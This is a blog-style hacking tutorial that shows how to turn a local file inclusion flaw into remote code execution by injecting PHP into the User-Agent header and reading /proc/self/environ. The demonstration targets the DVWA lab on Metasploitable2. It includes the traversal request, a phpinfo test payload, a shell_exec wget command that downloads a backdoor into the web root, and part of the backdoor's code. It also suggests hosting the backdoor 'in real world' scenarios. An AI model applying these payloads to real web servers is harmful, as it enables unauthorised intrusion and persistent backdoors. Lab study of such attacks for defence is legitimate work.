Exploiting Local File Inclusion (LFI ) vulnerability with /proc/self/environ method | LFI Attacks

In this post we are going to see, how an attacker can exploit LFI vulnerability to to achieve code execution by the use of /proc/self/environ method.

What is /proc/self/environ LFI Method ?

In Linux based system the environment-variables of the current process (self) can be accessed via /proc/self/environ. One of the environment-variables set (if apache2 is running) is the user-agent which can be controlled through a HTTP request. If the /proc/self/environ file can be accessed through LFI, then in this case “RCE” can be achieved by requesting the file in combination with the payload written into the HTTP User-Agent field.
GET lfi.php?file=../../../proc/self/environ HTTP/1.1
User-Agent: <?php phpinfo();?>
Now if an attacker sends the above http request to the web server then :
  • first the data on User-Agent field will written on the /proc/self/environ file.
  • Then the page request "lfi.php?file=../../../proc/self/environ" will include the content of /proc/self/environ file into the output page and our payload is get executed.
In this way a local file inclusion vulnerability can be leveraged to Remote Code Execution. Now lets see an example of it. For demonstration i am going to use Metasploitable2 VM with DVWA, You can download it from below link :

    Download Link : https://download.vulnhub.com/metasploitable/metasploitable-linux-2.0.0.zip

In DVWA web application, we are going to use "File Inclusion" page with 'low' security setting.

Now there is LFI vulnerability in 'page' input.

Now lets try to include /proc/self/environ file.

And it gets included in the output page, means it is also vulnerable to /proc/self/environ attack. Now we just just have to modify the 'User-Agent' header field of the request body, and it can be done by using any browser proxies like Burp Suite, ZAP proxy or you can also use temper data plugin on firefox. I am going to use Burp proxy.

Now first we are going to check weather our injected code will execute or not, and for this the payload will be :
<?php phpinfo();?> 
And our request body will be :

Response output :

And it works, means we successfully got executed our code on the web server. Now we are going to use the below payload :
<?php shell_exec('wget -O /var/www/shell.php');?>
The above php code will download backdoor file "shell.php" and store it on the web root directory (/var/www/), at here i am using a simple python http server to host backdoor file, in real world scenerio you can use the any web servers to host the backdoor file. The code used for php backdoor "shell.php" is :
  $cmd = $_GET['cmd'];
Now lets try the above payload.

Now lets try to access our backdoor.

And it works. In case if 'User Agent' field is filtered by web application, then you can also inject php code within Accept-Encoding' field.

Links to other Posts :